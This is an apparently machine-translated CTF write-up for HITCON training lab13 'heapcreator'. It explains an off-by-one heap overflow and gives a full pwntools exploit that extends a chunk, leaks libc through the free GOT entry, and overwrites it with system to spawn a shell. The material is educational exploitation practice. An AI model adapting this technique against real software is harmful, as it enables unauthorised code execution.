Chunk extend: hit training lab13

64 position ida analysis program , Common directory structure ;

Through static analysis Find out edit When There is off-by-one Loophole ：

Red box , You can enter one more byte .

First look at exp: 

from pwn import*
p = process("./heapcreator")
e = ELF("./heapcreator")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
context.log_level = "debug"

def create(size,content):
	p.recvuntil("Your choice :")
	p.sendline("1")
	p.recvuntil("Size of Heap :")
	p.sendline(str(size))
	p.recvuntil("Content of heap:")
	p.sendline(content)
def edit(index,content):
	p.recvuntil("Your choice :")
	p.sendline("2")
	p.recvuntil("Index :")
	p.sendline(str(index))
	p.recvuntil("Content of heap :")
	p.sendline(content)
	p.recvline()
def show(index):
	p.recvuntil("Your choice :")
	p.sendline("3")
	p.recvuntil("Index :")
	p.sendline(str(index))
def delete(index):
	p.recvuntil(":")
	p.sendline("4")
	p.recvuntil(":")
	p.sendline(str(index))
def exit():
	p.recvuntil(":")
	p.sendline("5")

create(24,'amazh')#0x18 + 0x10
create(16,'amazh')#0x10 + 0x10
edit(0,'/bin/sh\x00' +'a'*0x10+ '\x41')
delete(1)
create(0x30, p64(0) * 3 + p64(0x21) + p64(0x30) + p64(e.got['free'])) 
show(1)
p.recvuntil("Content : ")
data = p.recvuntil("Done !")
free_addr = u64(data.split("\n")[0].ljust(8, "\x00"))
#log.success(hex(free_data)
libc_base  = free_addr - libc.symbols['free']
log.success('libc base addr: ' + hex(libc_base))
system_addr = libc_base + libc.symbols['system']
edit(1, p64(system_addr))
#pause()
delete(0)

p.interactive()

Their thinking ：

First, two heap, The sizes are 0x18 and 0x10, We can edit heap0 Of content, Thus overflowing a byte , To control heap1 header Of size position , So as to achieve extend.

extend after , Conduct free(heap1) , We can get one 0x41 The size of chunk, And then again malloc This chunk write in got Address Can be revealed free The real address of the function   , Then you can write arbitrarily .